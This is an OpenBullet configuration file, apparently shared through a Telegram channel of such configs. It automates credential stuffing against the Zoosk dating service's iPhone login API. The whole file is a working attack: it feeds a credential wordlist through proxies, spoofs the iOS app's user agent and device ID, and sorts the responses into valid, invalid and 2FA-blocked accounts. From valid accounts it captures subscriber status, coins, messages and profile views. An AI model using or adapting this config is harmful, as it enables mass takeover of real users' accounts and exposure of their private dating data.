[SETTINGS] { "Name": "Zoosk IOS", "SuggestedBots": 85, "MaxCPM": 0, "LastModified": "2020-09-08T06:57:51.3939386-07:00", "AdditionalInfo": "Telegram Channel : T.me/OpenBulletConfigs", "RequiredPlugins": [], "Author": "\"The_FiendQQ\"", "Version": "1.2.2", "SaveEmptyCaptures": false, "ContinueOnCustom": false, "SaveHitsToTextFile": false, "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "BanProxyAfterGoodStatus": false, "BanLoopEvasionOverride": -1, "EncodeData": false, "AllowedWordlist1": "Credentials", "AllowedWordlist2": "", "DataRules": [], "CustomInputs": [], "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "QuitOnBanRetry": false, "DisableNotifications": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "" } [SCRIPT] BEGIN SCRIPT JavaScript function uuidv4() { return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) { var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8); return v.toString(16); }); } var udid = uuidv4(); END SCRIPT -> VARS "udid" #Udid FUNCTION ToUppercase "" -> VAR "UDID" #EncodeUSER FUNCTION URLEncode "" -> VAR "US" #Login REQUEST POST "https://api-iphone.zoosk.com/v4.0/api.php?locale=en_US&v_ps=2&product=3&set_locale=1&rpc=login%2Fgeneral_v42&format=json" CONTENT "password=&login=&device_model=iphone_6&z_device_id=159956751857&udid=" CONTENTTYPE "application/x-www-form-urlencoded charset=utf-8" HEADER "Host: api-iphone.zoosk.com" HEADER "Connection: close" HEADER "Accept: */*" HEADER "User-Agent: ZooskiPhone/8.21.4,iOS/12.4.5,iPhone7.2" HEADER "Accept-Language: en-us" HEADER "Accept-Encoding: gzip, deflate" KEYCHECK KEYCHAIN Failure OR KEY "We're sorry, the email and password combination you entered doesn't match." KEYCHAIN Success OR KEY "{\"type\":\"success" KEY "Welcome to Zoosk!" KEYCHAIN Custom "2FACTOR" OR KEY "\"is_blocked\":true" #Region PARSE "" LR "locale\":\"" "\"" CreateEmpty=FALSE -> CAP "Region" #New_Message PARSE "" LR "has_new_msg\":" ",\"" CreateEmpty=FALSE -> CAP "New Message" #Friend_Req_Count PARSE "" LR "friend_request_count\":" ",\"" CreateEmpty=FALSE -> CAP "Friend Req Count" #Trusted_Friend_Count PARSE "" LR "trusted_friend_count\":" ",\"" CreateEmpty=FALSE -> CAP "Trusted Friend Count" #Profile_Views PARSE "" LR "profile_view_count\":" ",\"" CreateEmpty=FALSE -> CAP "Profile Views" #Coin(s) PARSE "" LR "coin_count\":" ",\"" CreateEmpty=FALSE -> CAP "Coin(s)" #Subscriber PARSE "" LR "is_subscriber\":" ",\"" CreateEmpty=FALSE -> CAP "Subscriber"